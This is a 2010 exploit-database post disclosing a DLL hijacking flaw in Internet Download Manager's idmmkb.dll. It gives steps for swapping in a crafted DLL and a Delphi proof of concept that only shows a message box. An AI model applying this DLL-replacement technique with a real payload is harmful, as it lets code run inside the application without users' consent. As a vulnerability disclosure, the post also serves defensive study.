[local expoits] - Internet Download Manager module (idmmkb.d
Posted on 07 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Internet Download Manager module (idmmkb.dll) Tonec Inc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local expoits | Exploit author: STRELiTZIA' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================================= Internet Download Manager module (idmmkb.dll) Tonec Inc ======================================================= Exploit Title: [Dll Hijacking Exploit] Application: [Internet Download Manager module(idmmkb.dll) Tonec Inc.] Author: [STRELiTZIA] Version: [All Internet Download Manager release] Tested on: [Windows Xp, Vista, Windows 7] Description: ------------ Internet Download Manager module(idmmkb.dll) is a monitor for special keys (Alt, Ctrl, etc.) and for mouse clicks on web links in Internet Browsers. That allows other applications dynamic link libraries to execute malicious code without the users consent, in the privilege context of the targeted application. Instructions: ------------- 1- Copy "Test.dll" into %Internet Download Manager folder% 2- Rename "idmmkb.dll" to "idmmkb.dll_Original" 3- Rename "Test.dll" to "idmmkb.dll" Perform this tests: ------------------- - Restart your system. - Try to run Windows Internet Explorer or Mozilla Firefox. - Try to open you folders and links locate on your Desktop (My Computer, Recycle bin, My Documents and other...) - Choose any Link property and click Find target. Test Dll Delphi Source: ---//-- Library Test; uses Windows; begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission :)'), PChar('Sample'), MB_ICONSTOP ); end. ---//--- c) 2010 by STRELiTZIA. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre></body></html>